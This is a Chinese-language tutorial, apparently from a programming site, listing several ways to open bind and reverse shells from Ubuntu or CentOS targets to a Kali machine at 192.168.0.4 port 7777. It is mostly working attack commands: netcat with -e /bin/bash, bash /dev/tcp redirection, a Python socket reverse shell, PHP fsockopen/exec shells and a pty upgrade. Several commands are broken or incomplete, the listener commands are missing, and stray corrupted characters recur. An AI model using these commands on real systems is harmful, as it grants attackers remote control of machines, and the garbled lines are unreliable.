假如ubuntu、CentOS為目標(biāo)服務(wù)器系統(tǒng)
kali為攻擊者的系統(tǒng)��,ip為:192.168.0.4,開放7777端口且沒被占用
最終是將ubuntu���、CentOS的shell反彈到kali上
正向反彈shell
ubuntu或者CentOS上面輸入
nc -lvp 7777 -e /bin/bash
kali上輸入
正向反彈是目標(biāo)機先執(zhí)行nc命令�����,然后kali上再進行nc監(jiān)聽�����,即可反彈shell��。
需要目標(biāo)機安裝nc����。
反向反彈shell
方法1:bash反彈
bash -i > /dev/tcp/ip/port 0>1
但首先需要在kali上使用nc監(jiān)聽端口:
此方法在ubuntu下不會反彈成功����,CentOS可以反彈成功。
方法2:python反彈
反彈shell的命令如下:
復(fù)制代碼 代碼如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
首先�,使用nc在kali上監(jiān)聽端口:
在CentOS或者ubuntu下使用python去反向連接,輸入:
復(fù)制代碼 代碼如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
此方法ubuntu和Linux均反彈成功��。
方法3
首先在kali上輸入nc監(jiān)聽:
在CentOS或者ubuntu 上使用nc去反向連接�����,命令如下:
nc -e /bin/bash 192.168.0.4 7777
方法4:php反彈shell
首先在kali上輸入:
然后在目標(biāo)機上輸入:
php- 'exec("/bin/bash -i > /dev/tcp/192.168.0.4/7777")'
或
php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>3 1>3 2>3");'
注意php反彈shell的這些方法都需要php關(guān)閉safe_mode這個選項,才可以使用exec函數(shù)�。
遇到反彈后不是正常的shell,可用命令:
python -c 'import pty;pty.spawn("/bin/bash")'
轉(zhuǎn)化為常規(guī)的shell�����。
到此這篇關(guān)于詳解NC反彈shell的幾種方法的文章就介紹到這了,更多相關(guān)NC反彈shell內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家���!
